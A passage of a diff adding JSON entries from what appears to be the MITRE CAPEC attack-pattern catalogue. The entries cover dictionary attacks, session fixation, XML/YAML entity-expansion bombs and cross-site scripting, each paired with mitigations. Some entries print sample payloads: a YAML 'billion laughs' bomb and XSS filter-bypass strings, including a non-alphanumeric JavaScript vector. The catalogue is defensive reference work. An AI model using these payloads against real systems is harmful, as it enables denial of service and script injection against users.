", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.", + "The system does not have a sound password policy that is being enforced.", + "The system does not implement an effective password throttling mechanism." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A variety of password cracking tools and dictionaries are available to launch this type of an attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Create a strong password policy and ensure that your system enforces this policy.", + "id": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.", + "id": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e58b5f0-7d1d-48bc-bbfd-a15472142005", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services.", + "id": "course-of-action--4e15baee-dc2c-4af0-bad4-f2a1fd8a7000", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--21bb6f85-66f5-41e1-b24b-9ad75b3f1526", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e15baee-dc2c-4af0-bad4-f2a1fd8a7000", + "spec_version": "2.1", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support \n A similar example uses session ID as an argument of the URL.\n http://www.example.com/index.php/sessionid=0123456789\n Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim's session.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Analyze and Understand Session IDs: The attacker finds that the targeted application use session credentials to identify legitimate users.

    2. Techniques
    An attacker makes many anonymous connections and records the session IDs.
    An attacker makes authorized connections and records the session tokens or credentials.

Experiment

  1. Create Session IDs.: Attackers craft messages containing their forged credentials in GET, POST request, HTTP headers or cookies.

    2. Techniques
    The attacker manipulates the HTTP request message and adds their forged session IDs in to the requests or cookies.

Exploit

  1. Abuse the Victim's Session Credentials: The attacker fixates falsified session ID to the victim when victim access the system. Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the forged session identifier.

    2. Techniques
    The attacker loads the predefined or predicted session ID into their browser and browses to protected data or functionality.
    The attacker loads the predefined or predicted session ID into their software and utilizes functionality with the rights of the victim.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810" + ], + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers." + ], + "x_capec_resources_required": [ + "Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "Medium": "Forge the session credential and reply the request." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "id": "course-of-action--aba24572-8817-4d88-92bf-765eaa6ae508", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-196-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7fe664e-53db-4afa-acf9-45a9386c846a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aba24572-8817-4d88-92bf-765eaa6ae508", + "spec_version": "2.1", + "target_ref": "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "id": "course-of-action--9403f5e9-5529-4e19-8b52-23c80494dc87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-196-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7122b06c-8e94-4304-88f8-5f9d5c620b25", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9403f5e9-5529-4e19-8b52-23c80494dc87", + "spec_version": "2.1", + "target_ref": "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary submits data to a target application which contains nested exponential data expansion to produce excessively large output. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.", + "external_references": [ + { + "external_id": "CAPEC-197", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/197.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-776", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/776.html" + }, + { + "description": "XML Entity Expansion", + "external_id": "44", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Entity-Expansion" + }, + { + "description": "Amit Klein, Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD", + "external_id": "REF-64", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/archive/1/303509" + }, + { + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "external_id": "REF-65", + "source_name": "reference_from_CAPEC", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf" + }, + { + "description": "Elliotte Rusty Harold, Tip: Configure SAX parsers for secure processing, IBM developerWorks, 2005--05---27, IBM", + "external_id": "REF-66", + "source_name": "reference_from_CAPEC", + "url": "http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html" + }, + { + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "external_id": "REF-67", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx" + }, + { + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "external_id": "REF-67", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx" + } + ], + "id": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exponential Data Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Billion Laughs Attack", + "XML Bomb", + "XML Entity Expansion (XEE)" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The most common example of this type of attack is the \"many laughs\" attack (sometimes called the 'billion laughs' attack). For example:\n \n ]>&lol9;\n This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow.\n ", + "\n This example is similar, but uses YAML. This was used to attack Kubernetes [REF-686]\n a: &a [\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\"]b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using subsitituion on the victim's side.

    2. Techniques
    Use an automated tool to record all instances of URLs to process requests.
    Use a browser to manually explore the website and analyze how the application processes requests.

Experiment

  1. Craft malicious payload: The adversary crafts a malicious message containing nested exponential expansion that completely uses up available server resources. See the \"Example Instances\" section for details on how to craft this malicious payload.

Exploit

  1. Send the message: Send the malicious crafted message to the target URL.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This type of attack requires that the target must receive input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Ability to craft nested data expansion messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.", + "id": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-197-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0492ba63-8134-4235-a371-e1cf83184a85", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "spec_version": "2.1", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For XML based data - disable altogether the use of inline DTD schemas when parsing XML objects. If a DTD must be used, normalize, filter and use an allowlist and parse with methods and routines that will detect entity expansion from untrusted sources.", + "id": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-197-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6b369dc5-7f0d-40cb-8412-64f171649546", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "spec_version": "2.1", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page.", + "external_references": [ + { + "external_id": "CAPEC-198", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/198.html" + }, + { + "external_id": "CWE-81", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/81.html" + } + ], + "id": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting Error Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs as URL parameters: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application, looking for URLs which use parameters.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Cause application to return error page: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters into the parameters to see if an error page occurs, and if the injected payload is executed by the error page.

    2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they caused errors

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS through an error page, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the adversary the infected error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.\n ", + "x_capec_prerequisites": [ + "A third party web server which fails to adequately sanitize messages sent in error pages.", + "The victim must be made to execute a query crafted by the adversary which results in the infected error report." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use libraries and templates that minimize unfiltered input.", + "id": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ead6205-dacb-49ab-9007-3a8d39a3ea50", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for any input that will be used in error messages.", + "id": "course-of-action--c79cd2c1-58af-4951-8d6a-8767190e4ecd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d30e714c-2b9c-4a0d-95e1-7bf38e3f7c5e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c79cd2c1-58af-4951-8d6a-8767190e4ecd", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: The victim should configure the browser to minimize active content from untrusted sources.", + "id": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--201dd0ea-a13e-4039-a9c2-1b28e26c2560", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "spec_version": "2.1", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the \"script\" tag using the alternate forms of \"Script\" or \"ScRiPt\" may bypass filters where \"script\" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.", + "external_references": [ + { + "external_id": "CAPEC-199", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/199.html" + }, + { + "external_id": "CWE-87", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/87.html" + }, + { + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "external_id": "REF-69", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet" + }, + { + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "external_id": "REF-70", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting" + }, + { + "description": "Non-alphanumeric XSS cheat sheet", + "external_id": "REF-71", + "source_name": "reference_from_CAPEC", + "url": "http://sla.ckers.org/forum/read.php?24,28687" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-72", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Cross-Site+Scripting" + } + ], + "id": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Using Alternate Syntax", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, the adversary tries to get executed by the victim's browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An adversary will then create a special payload to bypass this filter:\n alert(1)\n when the applications gets this input string, it will replace all \"script\" (case insensitive) by the empty string and the resulting input will be the desired vector by the adversary:\n \n In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., ). For the adversary to execute the same payload as in the previous example, they would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter\n ((\\w+)\\s*\\(.*\\)|alert|eval|function|document)\n and replaces all matches by the empty string. For example each occurrence of alert(), eval(), foo() or even the string \"alert\" would be stripped. An adversary will then create a special payload to bypass this filter:\n this['al' + 'ert'](1)\n when the applications gets this input string, it won't replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The adversary could also have used non-alphanumeric XSS vectors to bypass the filter; for example,\n ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)\n would be executed by the JavaScript engine like alert(1) is.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Probe identified potential entry points for XSS vulnerability: Possibly using an automated tool, an adversary requests variations on the inputs they surveyed before using alternate syntax. These inputs are designed to bypass incomplete filtering (e.g., incomplete HTML encoding etc.) and try many variations of characters injection that would enable the XSS payload. They record all the responses from the server that include unmodified versions of their script.

    2. Techniques
    Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier. Attempt numerous variations based on form, format, syntax & encoding.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious script tag created using alternate syntax to bypass filters.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target client software must allow scripting such as JavaScript." + ], + "x_capec_resources_required": [ + "Ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use browser technologies that do not allow client side scripting.", + "id": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7f9249a2-6d3a-425e-9583-820baa614887", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 